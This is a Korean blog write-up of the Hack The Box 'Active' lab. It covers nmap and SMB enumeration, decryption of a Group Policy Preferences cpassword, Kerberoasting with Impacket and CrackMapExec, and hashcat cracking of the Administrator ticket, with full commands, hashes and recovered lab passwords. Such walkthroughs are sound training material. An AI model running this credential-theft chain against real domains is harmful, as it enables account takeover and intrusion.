Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 플라스크
- 오블완
- flask설치
- 티스토리챌린지
- NMAP
- 리버스 엔지니어링
- set
- 파이썬
- pe구조
- 클립보드간공유기능
- flask
- flask 구조
- 삼성클라우드오류
- tuple
- 리버싱
- 숫자분리
- AQ
- 레나튜토리얼
- 리버스엔지니어링
- portswigger
- 포트스캐너
- L
- 레나튜토리얼.
- 삼성노트동기화오류
- 멀티컨트롤오류
- flask blueprint
- Python
- 플라스크 애플리케이션 팩토리
Archives
- Today
- Total
정보보안
Active 본문
PWNED : 총 4시간
1.NMAP
$ nmap --script vuln -oA vuln -T4 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 11:57 KST
Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.10% done; ETC: 11:59 (0:00:04 remaining)
Nmap scan report for 10.129.69.12
Host is up (0.084s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 136.88 secondsnmap -sV -sC --top-ports 2000 --max-retries 2 -T5 -Pn -n -oA topports 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 12:13 KST
Warning: 10.129.69.12 giving up on port because retransmission cap hit (2).
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 63.16% done; ETC: 12:14 (0:00:09 remaining)
Nmap scan report for 10.129.69.12
Host is up (0.082s latency).
Not shown: 1743 closed tcp ports (conn-refused), 238 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-17 03:13:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -9s
| smb2-time:
| date: 2023-09-17T03:14:40
|_ start_date: 2023-09-17T02:26:42
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required//같은 명령이지만 이렇게도 할 수 있음을 배움.
$ nmap -Pn -n --open -p 53,88,135,138,389,445,3268 -sV -sC -oA tcpdetailed 10.129.69.12
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 12:26 KST
Nmap scan report for 10.129.69.12
Host is up (0.096s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-17 03:26:04Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -10s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-17T03:26:11
|_ start_date: 2023-09-17T02:26:42
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds2. SMB Enum
$ smbmap -H 10.129.69.12
[+] IP: 10.129.69.12:445 Name: 10.129.69.12
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS$ smbclient -N //10.129.69.12/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 19:37:44 2018
.. D 0 Sat Jul 21 19:37:44 2018
active.htb D 0 Sat Jul 21 19:37:44 2018
10459647 blocks of size 4096. 5203534 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
. D 0 Sat Jul 21 19:37:44 2018
.. D 0 Sat Jul 21 19:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 19:37:44 2018
Policies D 0 Sat Jul 21 19:37:44 2018
scripts D 0 Thu Jul 19 03:48:57 2018
10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
. D 0 Sat Jul 21 19:37:44 2018
.. D 0 Sat Jul 21 19:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 19:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 19:37:44 2018
10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
. D 0 Sat Jul 21 19:37:44 2018
.. D 0 Sat Jul 21 19:37:44 2018
GPT.INI A 23 Thu Jul 19 05:46:06 2018
Group Policy D 0 Sat Jul 21 19:37:44 2018
MACHINE D 0 Sat Jul 21 19:37:44 2018
USER D 0 Thu Jul 19 03:49:12 2018
10459647 blocks of size 4096. 5203534 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
. D 0 Sat Jul 21 19:37:44 2018
.. D 0 Sat Jul 21 19:37:44 2018
Groups D 0 Sat Jul 21 19:37:44 2018
10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 19:37:44 2018
.. D 0 Sat Jul 21 19:37:44 2018
Groups.xml A 533 Thu Jul 19 05:46:06 2018
10459647 blocks of size 4096. 5203534 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 4.5 KiloBytes/sec)
$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>GPP Decrypt
cpassword를 decrypt해야 해서 구글링했더니 아래와 같은 github을 발견함.
https://github.com/t0thkr1s/gpp-decrypt
그룹 정책 기본 설정 XML 파일을 구문 분석하여 사용자 이름을 추출하고 cpassword 속성을 해독하는 도구.
$ git clone https://github.com/t0thkr1s/gpp-decrypt
$ cd gpp-decrypt $ sudo python3 setup.py install
$ pip3 install pycryptodome // 중요, 에러나서 한참 해맴
// 안 될 경우 pip3 uninstall pycrypto, crypto 후 pycryto만 다시 설치$ python3 gpp-decrypt/gpp-decrypt.py -f Groups.xml
_ _ _ _ __ _/ / _ __ __ _ __ ___ / /
/ _ `/ / _ \ / _ /// _ / / -)/ / / _/ / // / / _ / __/
\, / / ./ / ./ _,_/ \/ _/ // _, / / ./\/
// // // // /_/
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18패스워드 평문화까지 완료.
Kerberosting
"SPN(서비스 사용자 이름)은 서비스 인스턴스의 고유 식별자입니다.
SPN은 Kerberos 인증에서 서비스 인스턴스를 서비스 로그온 계정과 연결하는 데 사용됩니다. " - MSDN
유효한 도메인 사용자는 모든 도메인 서비스에 대해 ST(kerberos 티켓)를 요청할 수 있습니다.
티켓이 수신되면 티켓에서 오프라인으로 비밀번호 크래킹을 수행하여 서비스를 실행 중인 모든 사용자의 비밀번호를 해독할 수 있습니다.
1. Impacket Suite의 GetUserSPN을 사용한 Kerberosting
```bash
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.69.12 -request
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 04:06:40.351723 2023-09-17 11:27:43.687337
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cea499929257df6c2409286fa1b312e0$041ca8cfc3fc0f9be317853c6339d05e15f374edc63e9783085d4a84708f1e21c5883e77a1a0e03da83510288f5901c2690836e81fb1dfcccdf70aef68eef65726a41048a61c0dd945c5ff20dba2dbac92e8d328534f30c1271e8ad5b3b9c5577b04b0c7e9e2fce2b7491a7e37672ee37d6cfc43f9d8ffb16e8871b1d19e7fe79369254bed9d2ee0911ddb13a2107e4de4b4eb75d5b55ae25db0b2c4b60f7784bf420edb948d4c2d4630548c954eeeac335d4a2ca4e934823c9c1e18ffcabfa6e94e75a318658a4c5248c783891a6c64b6638543ef871471ad7bfcbaa729c025b5b70add22b320e10a8d5294518db5b5a48631867523aea65cd363487779d4f8ad038d595d4269daeb8b027fda789684322970b4f181db1322cdaf89bbc552c75d9a2bcbfbe8f341194f90275c2bc7c784024eeaa7b988c002a29b8de60e909f670a2e148ba083eb4aca6d20adbb3a665b63568c3b5af17d27bea3c142ef8dd2625a4036c8eae957ae831a0d9c7fe6dc8ade3740a6cacf69b476299a63bce65991a0ec790613da370b06d8720619bf3df5b54629179f0661ac782132e018c6c8855f22ae46e0a5d2a6454077a1ea09a9cbad3803b341ec6b93da3ee6311cf3595c36474dc2ef7429a69ca118c36a705b44d8d3fe51730e25fde633736c895f3ef58e6d827c4ca13850ac31b48af70f783f5211a30eb19e7537e4e91b31851877c9b7763a7863ee33dc76fb3164448e3ef08e7afb269798f214cef8c62f7174cef526ae0c7b7cf2d63a0c1245574bd1295812dfa3bb787198193ca0f1a99e58fe35d416edae1db0e63d967835a3c2939df7213e215e4ad4a8ec3e8db9528a0db7e9578df40cb597cb6537abd4842ab891b7fe37521cb91186ca0c0632a4511cc62e80c9983ef9104eb20e82af33ee79ac3c8111a6f753e0aefe927ca4fb9a513b57d6f2fa74890b7fe803558dcbaf093371c5ec6dedb65c86c3d8dca9a4ee827ef737a3b22e4523da76277689bfe96769ee9f4e869afbc7749d4412c3d6e61c116836ad9c92d864df9e2a452dd272ec8eb3cc5c39a33fca9e64f5e159b62be139ff60736947165d15d2b96fe1c07882fc0449ef7b7ff7d71a50f0b6c75c3f5a042604f7057b544618b1b64366b21e85f275d251c9d69bd9eb61bb561de1d4692ad6208a217e7383c72083e7e87fde52f83b66eb4ffa6b592a790b19446d06b30762a0e61e485a350cacd460a2f1762d776140e056a82ea9becba6
2. CrackMapExec 모듈을 사용한 Kerberosting
$ crackmapexec ldap [TARGET IP] -u 'username' -p 'password' --kdcHost [TARGET IP] --kerberoast output.txt
$ crackmapexec ldap 10.129.69.12 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kdcHost 10.129.69.12 --kerberoast output.tx
SMB 10.129.69.12 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP 10.129.69.12 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.129.69.12 389 DC [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP 10.129.69.12 389 DC sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-19 04:06:40.351723 lastLogon:2023-09-17 11:27:43.687337
LDAP 10.129.69.12 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9415bb9ddfaf220c1df94b2838de058$95469269154fa202dce530ef37a275e1ccde88850b9a42b038bc9f1038ffe033f00d5e957d70dab77622aad76c63b899c347d85433db40de8a8555a59405c825abde84735564e31e08237e8dbfd6504e1d667899e1330dc958346f19eae3331622dca52a99cdd12816c1221683eb057dde3d61eb5027115d10cc786804ebd85937859fea0a27d97f196e412723f83abc5acde9ed89488aaf9b9260f046d18c71eb582a8c5fc38cbbbcd94b4150f8ea33756f50d6cd53da4ce826cd5f02e8505c08581944716668430b95a840403f35007be6fc68873bf8198c9f3427f6c2c4c6e98cddfd59f6600d8c7a565b8a09c768fb7e43b41fccc555306cff272357a05d2191a71725c614dfaf292a2938e38ec040271b925b8ff270f9e55d87dd18901edfe5017d48208b4675d81bd640eba433d8de8f84770a332fd2af4415d783cc291db3529438fd75f51b06c04bdea362a16b73f4c959f1ffe04375de58cee6f8c6029bddfe022d098f6216f5ed2ef29f62d1f54b4fd9fa2bf64c262138e9c45c3c430a19cdb627b8de66562d34868965ed4ae6a1e388f69c6d13ad1d1dc4e60f0a69061cfaefeb15c257c88be8173ccc996e9f3160d4be077ce80db175c7dc1427cac552d3b6fcde811f077311c9d8f607db205bda3e30c23c1956ad1b1f2faa3168486aa1bf133490745f939204567065392edfe676862cd237c69b0fa6c7b7f0a504f15cb5f076a8c48f1b9e26b4b3c2585c997683873993ba443d35850ae87972b42549aa574321b8211b2ec38233e3d0562d957a4b3f1ca51813563311b5bda8e5b95ea5a6a17f1d79465636d1443676584e295718f8a4a4b481a9380807c1541afbb4fc36e59560474dbb47936d65bdfdeb224bdc44636cf016305a56dac8ae93861a0bc7f0ad31ca7ed9e3dd59938899b9cda9894beabbdafa0e53f1925b38ce9fb1983ea9f30abe6ca15b7878c0be31e6e45a68569734b0e0cf69690209f7a8822ea797836b748e7c62c863f73894ecf3207f67e45f52881112f2ad429f7d4f3dbf95f009502567c685063d07c0ac663877b134c81d9eacec581e31a7f3bb434b56157b749d03a4921f514a4aed83979c0eeddd3945e2e470fdc4def6534159f90546550b0afcff8394a7cb0c9b154ce9cc2cdb94d163bf23a6868fcc56b15ca9dd2c3cec43c153a59c9c2dd0f1506bcbf8e517ec64514b538801184b955794acf699e0e74d0a70537e444f5700f277aaf2170aa7c255a2HASHCAT
krb5tgs는 13100번이다.
$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt -o admin.txt --quiet
$ cat admin.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f9415bb9ddfaf220c1df94b2838de058$95469269154fa202dce530ef37a275e1ccde88850b9a42b038bc9f1038ffe033f00d5e957d70dab77622aad76c63b899c347d85433db40de8a8555a59405c825abde84735564e31e08237e8dbfd6504e1d667899e1330dc958346f19eae3331622dca52a99cdd12816c1221683eb057dde3d61eb5027115d10cc786804ebd85937859fea0a27d97f196e412723f83abc5acde9ed89488aaf9b9260f046d18c71eb582a8c5fc38cbbbcd94b4150f8ea33756f50d6cd53da4ce826cd5f02e8505c08581944716668430b95a840403f35007be6fc68873bf8198c9f3427f6c2c4c6e98cddfd59f6600d8c7a565b8a09c768fb7e43b41fccc555306cff272357a05d2191a71725c614dfaf292a2938e38ec040271b925b8ff270f9e55d87dd18901edfe5017d48208b4675d81bd640eba433d8de8f84770a332fd2af4415d783cc291db3529438fd75f51b06c04bdea362a16b73f4c959f1ffe04375de58cee6f8c6029bddfe022d098f6216f5ed2ef29f62d1f54b4fd9fa2bf64c262138e9c45c3c430a19cdb627b8de66562d34868965ed4ae6a1e388f69c6d13ad1d1dc4e60f0a69061cfaefeb15c257c88be8173ccc996e9f3160d4be077ce80db175c7dc1427cac552d3b6fcde811f077311c9d8f607db205bda3e30c23c1956ad1b1f2faa3168486aa1bf133490745f939204567065392edfe676862cd237c69b0fa6c7b7f0a504f15cb5f076a8c48f1b9e26b4b3c2585c997683873993ba443d35850ae87972b42549aa574321b8211b2ec38233e3d0562d957a4b3f1ca51813563311b5bda8e5b95ea5a6a17f1d79465636d1443676584e295718f8a4a4b481a9380807c1541afbb4fc36e59560474dbb47936d65bdfdeb224bdc44636cf016305a56dac8ae93861a0bc7f0ad31ca7ed9e3dd59938899b9cda9894beabbdafa0e53f1925b38ce9fb1983ea9f30abe6ca15b7878c0be31e6e45a68569734b0e0cf69690209f7a8822ea797836b748e7c62c863f73894ecf3207f67e45f52881112f2ad429f7d4f3dbf95f009502567c685063d07c0ac663877b134c81d9eacec581e31a7f3bb434b56157b749d03a4921f514a4aed83979c0eeddd3945e2e470fdc4def6534159f90546550b0afcff8394a7cb0c9b154ce9cc2cdb94d163bf23a6868fcc56b15ca9dd2c3cec43c153a59c9c2dd0f1506bcbf8e517ec64514b538801184b955794acf699e0e74d0a70537e444f5700f277aaf2170aa7c255a2:Ticketmaster1968ADMIN 접속
$ smbclient //10.129.69.12/Users$ -U administrator
Password for [WORKGROUP\administrator]:
Try "help" to get a list of possible commands.
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\> get Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as Desktop\user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
'HTB/Windows' Related Articles
more
